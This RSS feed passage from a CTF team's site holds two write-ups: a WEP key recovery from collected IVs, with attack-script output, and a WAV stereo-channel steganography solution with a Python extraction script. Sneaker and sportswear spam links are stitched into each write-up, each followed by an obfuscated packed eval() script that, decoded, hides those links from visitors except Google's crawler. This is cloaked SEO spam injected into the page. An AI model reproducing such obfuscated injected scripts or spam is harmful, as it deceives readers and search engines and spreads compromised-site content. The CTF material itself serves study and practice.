__nu11___: well you have IVs from yesterday aren't you?</p><p>01:11 (Dor1s) yeah, from yesterday too</p><p>01:11 __nu11___: haven't you*</p><p>01:12 __nu11___: I am afraid that we have changed it to make it easier</p><p>01:12 (Dor1s) omg :D</p><p>01:12 __nu11___: but no worries</p><p>01:12 __nu11___: the key now is only 5 bytes</p><p>01:12 __nu11___: you only collect 255 IVs</p><p>01:12 __nu11___: so you should solve it in minutes</p></blockquote><p>&nbsp;</p><p><span style="text-decoration: underline;">ROUND 2</span></p><p>Because data selection has been already automated via python script. We've spend the time it collects needed data to upgrating attack script. First upgrate was connected with work speed: now attack's script compute all votes for 290000 pair only in 10 seconds instead of 30.</p><p>Second upgrate was the most famous one. It was connected with work logic. Formula (5) returns votes that were either positive or negative numbers. But as we know, key element is byte, so all votes for it should be in range [0,255]. So when we collect every possible key value frequency we should sum votes, whose value is the same after mod 256 operation. With enought amount of data it's give us automated key value extraction (we select that one, which has the highest frequency).</p><p>Now, when ~9Mb of data (~67000 pairs) were collected, we can run our attack script on it...</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">&gt;extractWepkey.py
67470 pairs have been read in 0.72591048583 seconds!
make votes...
votes ready in 2.18306579468 seconds!
(0, -258, 251)
(1, -262, 248)
(2, -266, 243)
(3, -272, 237)
(4, -280, 228)
sigma_0 max = 119 : 357
sigma_1 max = 220 : 375
sigma_2 max = 76 : 363
sigma_3 max = 190 : 330
sigma_4 max = 33 : 367
auto guess key = weprc</pre><p>So the flag is <strong>weprc</strong></p><p>All scripts and collected data can be found there: <a href="https://github.com/BalalaikaCr3w/CTF/tree/master/CSCAMPCTFQuals2014/crypto300">https://github.com/BalalaikaCr3w/CTF/tree/master/CSCAMPCTFQuals2014/crypto300</a></p><span class="keys_words"><a class="links_good_rands" href="https://www.jmksport.com/">Sportswear Design</a> | <a class="links_good_rands" href="https://www.ietp.com/fr/dfedavshop/nike-air-more-uptempo-maximum-volume-dj4633-010-release-date/">nike air barkley posite 76ers shoes for women Maximum Volume DJ4633-010 Release Date - SBD</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Sun, 23 Nov 2014 01:06:30 +0000</pubDate>
<dc:creator>Dil4rd</dc:creator>
<guid isPermaLink="false">93 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/93#comments</comments>
</item>
<item>
<title>WireTap (Stegano 200)</title>
<link>https://ctfcrew.org/writeup/91</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/stego">stego</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/28">No cON Name CTF Finals 2014</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p><span data-rz-clipboard="true"><strong>Description:</strong> Does it sound like a flag? Maybe... I don't know...</span></p><p><span data-rz-clipboard="true">File: <a href="https://cloud.mail.ru/public/fd1b20161fe5/wiretap.wav.tar.xz">wiretap.wav</a></span></p><p><strong>Solution:</strong></p><p>Let's quickly analyze the file:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag"> $ file wiretap.wav
wiretap.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 32 bit, stereo 44100 Hz
$ strings wiretap.wav
RIFFD
WAVEfmt
data </pre><p>Nothing interesting. Now look at data of .wav file:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ ./diff.py
n of channels:
2
n of frames:
1186020
len(frames):
9488160
44100
2
[5373952 7143424 8388608 ..., 5111808 4980736 4915200]
[5374089 7143504 8388686 ..., 5111991 4980814 4915379]</pre><p>Values of frames from two different channels are close enough but not the same. Let's look at their difference (first 100 printed):</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82, 0, 0, 2, 22, 0, 0, 0, 48, 8, 4, 0, 0, 0, 231, 36, 251, 90, 0, 0, 0, 2, 98, 75, 71, 68, 0, 0, 170, 141, 35, 50, 0, 0, 0, 9, 112, 72, 89, 115, 0, 0, 11, 19, 0, 0, 11, 19, 1, 0, 154, 156, 24, 0, 0, 0, 7, 116, 73, 77, 69, 7, 222, 10, 26, 15, 41, 21, 179, 51, 68, 152, 0, 0, 0, 29, 105, 84, 88, 116, 67, 111, 109, 109, 101]</pre><p>Seems that all of them are in range of byte values [0..255]. Some of you may be have already noticed that bytes from 2 to 4 are printable characters ('PNG'). Let's write difference of channels into file and look at it:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">$ file result
result: PNG image data, 534 x 48, 8-bit gray+alpha, non-interlaced</pre><p>Wow! Look there:</p><p><img src="/sites/default/files/writeups/images/result_ncn2014final_wav.png" alt="" width="534" height="48"></p><p>My script for solving this task:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">#!/usr/bin/python
import wave
from scipy.io.wavfile import read
w = wave.open('wiretap.wav', 'r')
print 'n of channels:'
print w.getnchannels()
n = w.getnframes()
print 'n of frames:'
print n
frames = w.readframes(n)
print 'len(frames):'
print len(frames)
(fs, x) = read('wiretap.wav')
print fs
print len(x.shape)
print x[:,0]
print x[:,1]
c1 = x[:,0]
c2 = x[:,1]
d = []
for a, b in zip(c1, c2):
d.append(b - a)
print d[0:100]
out = open('result', 'wb')
for t in d: out.write(chr(t))
out.close()</pre><p>Flag is: <strong>NcN_132238aba8928f9655eeb09939eba1f963c18183</strong></p><p>&nbsp;</p><span class="keys_words"><a class="links_good_rands" href="https://www.jmksport.com/">buy footwear</a> | <a class="links_good_rands" href="https://www.iicf.org/bdfnshop/2021/03/nike-air-max-excee-cork-white-dj1975-100/">ナイキ エア マックス エクシー "コルク/ホワイト" (NIKE AIR MAX EXCEE "Cork/White") [DJ1975-100] , Fullress , スニーカー発売日 抽選情報 ニュースを掲載!ナイキ ジョーダン ダンク シュプリーム SUPREME 等のファッション情報を配信!</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Sun, 02 Nov 2014 19:37:53 +0000</pubDate>
<dc:creator>Dor1s</dc:creator>
<guid isPermaLink="false">91 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/91#comments</comments>
</item>
</channel>
</rss>